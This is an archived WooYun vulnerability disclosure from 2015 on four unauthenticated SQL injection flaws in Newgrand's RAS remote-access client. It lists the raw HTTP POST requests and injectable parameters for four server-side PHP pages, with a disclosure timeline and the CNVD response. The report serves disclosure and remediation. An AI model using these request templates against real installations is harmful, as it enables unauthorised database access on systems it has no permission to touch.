当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142028

漏洞标题:新中大软件远程接入客户端存在四处SQL注入无需登录

相关厂商:新中大软件股份有限公司

漏洞作者: 路人甲

提交时间:2015-09-22 11:16

修复时间:2015-12-23 16:20

公开时间:2015-12-23 16:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:19

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-22: 细节已通知厂商并且等待厂商处理中
2015-09-24: 厂商已经确认,细节仅向厂商公开
2015-09-27: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-11-18: 细节向核心白帽子及相关领域专家公开
2015-11-28: 细节向普通白帽子公开
2015-12-08: 细节向实习白帽子公开
2015-12-23: 细节向公众公开

简要描述:

新中大软件远程接入客户端存在四处SQL注入(无需登录DBA权限)

详细说明:

登录 - 新中大RAS企业版客户端
案例:
**.**.**.**:81/Cmxlogin.php
**.**.**.**:8080/cmxlogin.php
http://**.**.**.**/cmxlogin.php
**.**.**.**:8080/cmxlogin.php
**.**.**.**:8000/cmxlogin.php
**.**.**.**/cmxlogin.php
4个文件存在注入
第一、

POST /server/cmxsecurity.php?pgid=ClientDisk_UserGroup&SearchFlag=true HTTP/1.1
Content-Length: 183
Content-Type: application/x-www-form-urlencoded
Referer: **.**.**.**:81/Cmxlogin.php
Cookie: PHPSESSID=a9fju6tgsctn1rvui196cike11; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=chceg; temp_DisplayName=qtdpbcvd; temp_Description=1
Host: **.**.**.**:81
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
clear=%e6%b8%85%e7%a9%ba&next=%e4%bf%9d%e5%ad%98&NMCancel=%e8%bf%94%e5%9b%9e&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&UserGroupID%5b-1%5d=99%7eyes&ViewUserFld=123&ViewUserFldValue=ngwspaxq


注入点:ViewUserFld

cmxsecurity--isdb.jpg


第二、

POST /server/cmxusergroup.php?pgid=Group_Add_Step4&t=1442501088 HTTP/1.1
Content-Length: 436
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=bum6j9auangridtjetl3lb69q4; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=WIN-SOJKTM3CITO; temp_DisplayName=xeuebivm; temp_Description=1; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files+%28x86%29%5Cnewgrand%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E
Host: **.**.**.**:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
NMNext=%e4%b8%8b%e4%b8%80%e6%ad%a5>&AppID%5b0%5d=123&AppID%5b1%5d=658&GroupName=RAS_tksebfth&NMCancel=%e8%bf%94%e5%9b%9e&NMPrev=<%e4%b8%8a%e4%b8%80%e6%ad%a5


注入点:AppID%5b0%5d ,AppID%5b1%5d

0.jpg


1.jpg

漏洞证明:

第三、

POST /server/cmxpagedquery.php?pgid=AppList&SearchFlag=true HTTP/1.1
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Referer: **.**.**.**:81/Cmxlogin.php
Cookie: PHPSESSID=a9fju6tgsctn1rvui196cike11; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=chceg; temp_DisplayName=qtdpbcvd; temp_Description=1
Host: **.**.**.**:81
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
AppID%5b-1%5d=623&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=123&ViewAppValue=1


注入点:ViewAppFld

**.**.**.**--dbs.jpg


第四、

POST /server/cmxfolder.php?pgid=AppList&SearchFlag=true&t=1433251155 HTTP/1.1
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=1&ViewAppValue=1


注入点:ViewAppFld

**.**.**.**.jpg


**.**.**.**--cmxfolder---fld.jpg

修复方案:

#过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-24 16:18

厂商回复:

CNVD确认所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无